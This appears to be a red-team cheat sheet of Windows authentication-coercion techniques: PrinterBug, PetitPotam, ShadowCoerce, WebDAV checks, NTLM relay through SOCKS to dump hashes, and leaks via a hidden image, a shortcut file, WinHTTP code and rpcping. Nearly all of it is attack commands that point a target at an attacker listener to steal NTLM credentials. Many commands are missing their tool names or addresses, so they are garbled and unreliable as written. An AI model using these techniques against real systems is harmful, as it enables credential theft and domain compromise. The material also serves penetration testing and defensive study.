Authentication Coercion

When triggering these callbacks, also check whether the coerced host can be talked down to NTLMv1: a captured NTLMv1 response is far cheaper to crack than an NTLMv2 one.

See: NTLMv1 Downgrade

Printer Bug (MS-RPRN)

Check that the Spooler service is running on the target, e.g. by listing the RPC interfaces registered on it and looking for the ones spoolsv.exe exposes, MS-RPRN and MS-PAR:

$ MEGACORP/snovvcrash:'Passw0rd!'@ | grep -A2 -e MS-RPRN -e MS-PAR


Cmd > .\SpoolSample.exe
Cmd > .\SpoolSample.exe attacker@80/test.txt
Cmd > .\SpoolSample.exe attacker@SSL/test.txt

$ python -d megacorp.local -u snovvcrash -p 'Passw0rd!' DC01.megacorp.local
$ python -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local

$ python megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local
$ python megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt

PetitPotam (MS-EFSR)


$ python3 -d '' -u '' -p '' [-pipe all]
$ python3 -d '' -u '' -p '' attacker@80/test.txt
$ python3 -d '' -u '' -p '' attacker@SSL/test.txt
Cmd > .\PetitPotam.exe 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 1

PetitPotam against any host (not only a DC, which typically allows null sessions to the IPC$ share) without initial creds: relay a DC's machine account to a host that accepts it, keep the resulting SMB session open as a SOCKS proxy, and run PetitPotam through that proxy on behalf of the relayed machine account. A plain unauthenticated attempt against such a host is refused:

$ python3 -d '' -u '' -p ''
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

$ -ip -t -smb2support -socks --no-http-server --no-wcf-server --no-raw-server

$ python3 -d '' -u '' -p '' DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers

$ sudo ./ -I eth0 -vA 
$ proxychains4 python3 -d MEGACORP -u 'DC1$' -no-pass

NTLM Relay DC1 to EXCH1 to get SOCKS ➡️ PetitPotam EXCH1 through the SOCKS proxy as DC1$ ➡️ NTLM Relay the coerced EXCH1 to EXCH2 to dump hashes

With Kerberos authentication:

$ megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local



ShadowCoerce (MS-FSRVP)

$ python3 -d megacorp.local -u snovvcrash -p 'Passw0rd!'

WebDAV (WebClient)

Check whether a callback over WebDAV (HTTP) is possible. It is when the WebClient service is running on the target. This matters because NTLM authentication that arrives over HTTP, unlike SMB, does not negotiate signing, so it can be relayed to LDAP/LDAPS: relaying the victim's machine account there lets you configure RBCD and take over the workstation.

Check via PowerShell:

PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\\pipe\DAV RPC SERVICE'

Check via CME:

$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'

Check via GetWebDAVStatus:

PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1

Enable WebClient

Put a .searchConnector-ms file on a share that victims browse and that you can write to. When a domain user opens that folder in Explorer, the WebClient service is started automatically to handle the connector's HTTP location:

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="">
    <description>Microsoft Outlook</description>



Leak with PowerShell:

PS > IWR -UseDefaultCredentials

Leak with Python:

import win32com.client

URL = ''  # attacker listener URL (HTTP or WebDAV)

# WinHTTP performs NTLM authentication on the caller's behalf, leaking the
# current user's credentials to the listener.
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.SetAutoLogonPolicy(0)  # 0 = always auto-logon (the default only does so for intranet/bypass-proxy hosts)
COM_OBJ.Open('GET', URL, False)
COM_OBJ.Send()  # nothing goes on the wire until the request is actually sent

Leak with rpcping (catch with Responder's DCE-RPC listener):

Cmd > rpcping -s -e 135 -a privacy -u NTLM

Leak with a hidden image:

<img src="\\\pwn.ico" height="1" width="1" />

Leak with a shortcut:

$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\\pwn.ico"  # Explorer fetches the icon from the UNC path as soon as the folder is listed
$lnk.Save()  # the shortcut is not written to the share until Save() is called

Coercer

Try all known coercion methods at once (optionally narrowed down to one pipe or one RPC method):

$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1
